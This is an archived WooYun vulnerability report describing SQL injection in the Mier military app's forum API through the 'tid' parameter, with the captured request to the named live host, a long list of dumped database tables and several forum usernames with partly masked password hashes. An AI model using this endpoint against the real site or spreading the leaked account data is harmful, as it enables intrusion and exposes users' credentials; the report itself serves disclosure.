当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122508

漏洞标题:米尔军事app注射之三 (N多表)

相关厂商:米尔网

漏洞作者: DloveJ

提交时间:2015-06-24 18:26

修复时间:2015-08-08 18:28

公开时间:2015-08-08 18:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

非要让我数据证明下,和上一个洞窟一样,只不过注入点不同,我觉得没有必要吧,无韵筠???

详细说明:

S50624-091638.jpg

米尔社区处,随便点击一篇文章。。抓包。。

GET /api/2.0.3/viewthread_json.php?tid=1715411&plat=android&proct=mierapp&apiCode=1 HTTP/1.1 Content-Length: 0 Host: bbs.mier123.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Cookie: jc7_sid=91qR9r Cookie2: $Version=1 Accept-Encoding: gzip

tid可注射! 危害同上俩个洞!

2.jpg

漏洞证明:

其中的部分表

| `[Table]onlinelist`            |
| `[Table]onlinetime` |
| `[Table]orders` |
| `[Table]paymentlog` |
| `[Table]pk_reply` |
| `[Table]pk` |
| `[Table]plugin_promotion` |
| `[Table]pluginhooks` |
| `[Table]plugins` |
| `[Table]pluginvars` |
| `[Table]polloptions` |
| `[Table]polls` |
| `[Table]postlogs` |
| `[Table]postposition` |
| `[Table]posts` |
| `[Table]profilefields` |
| `[Table]projects` |
| `[Table]promotions` |
| `[Table]prompt` |
| `[Table]promptmsgs` |
| `[Table]prompttype` |
| `[Table]purifyhylanda` |
| `[Table]quick_login` |
| `[Table]quiz_answer` |
| `[Table]quiz_cat` |
| `[Table]quiz_comment` |
| `[Table]quiz_user_log` |
| `[Table]quiz` |
| `[Table]ranks` |
| `[Table]ratelog` |
| `[Table]regips` |
| `[Table]relatedthreads` |
| `[Table]reportlog` |
| `[Table]request` |
| `[Table]rewardlog` |
| `[Table]rsscaches` |
| `[Table]searchindex` |
| `[Table]sessions` |
| `[Table]settings` |
| `[Table]sign_in` |
| `[Table]smilies` |
| `[Table]spacecaches` |
| `[Table]stats` |
| `[Table]statvars` |
| `[Table]styles` |
| `[Table]stylevars` |
| `[Table]tags` |
| `[Table]tasks` |
| `[Table]taskvars` |
| `[Table]templates` |
| `[Table]threadlogs` |
| `[Table]threads` |
| `[Table]threadsmod` |
| `[Table]threadtags` |
| `[Table]threadtypes` |
| `[Table]tradecomments` |
| `[Table]tradelog` |
| `[Table]tradeoptionvars` |
| `[Table]trades` |
| `[Table]typemodels` |
| `[Table]typeoptions` |
| `[Table]typeoptionvars` |
| `[Table]typevars` |
| `[Table]uc_admins` |
| `[Table]uc_applications` |
| `[Table]uc_badwords` |
| `[Table]uc_domains` |
| `[Table]uc_failedlogins` |
| `[Table]uc_feeds` |
| `[Table]uc_friends` |
| `[Table]uc_mailqueue` |
| `[Table]uc_memberfields` |
| `[Table]uc_members` |
| `[Table]uc_mergemembers` |
| `[Table]uc_newpm` |
| `[Table]uc_notelist` |
| `[Table]uc_pms` |
| `[Table]uc_protectedmembers` |
| `[Table]uc_settings` |
| `[Table]uc_sqlcache` |
| `[Table]uc_tags` |
| `[Table]uc_vars` |
| `[Table]uin_black` |
| `[Table]userapp` |
| `[Table]usergroups` |
| `[Table]validating` |
| `[Table]verify_code` |
| `[Table]war_log` |
| `[Table]war_threads` |
| `[Table]war_user_arms` |
| `[Table]war_user_hoon` |
| `[Table]war_user_status` |
| `[Table]war_user` |
| `[Table]warnings` |
| `[Table]words` |
| `[Table]xreports` |
| `[Table]xwb_bind_info` |
| `[Table]xwb_bind_thread` |
| `[Table]xwb_session` |
| m_sign_in |
| pre_common_member_login |
| pw_log_forums |
| pw_log_members |
| pw_log_posts |
| pw_log_threads |


bbs的论坛密码

1 sdmf**kasd 56137***51fd76c60fbed3a
2 米尔007 f1847424********04f3636d4c5fc9b
4 米尔 a2fcf4e******28ec8d0bcb19ad0e2
5 \xc7Řłż 46d6ac1a******93d562cfd10aff4

我自己打的码

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论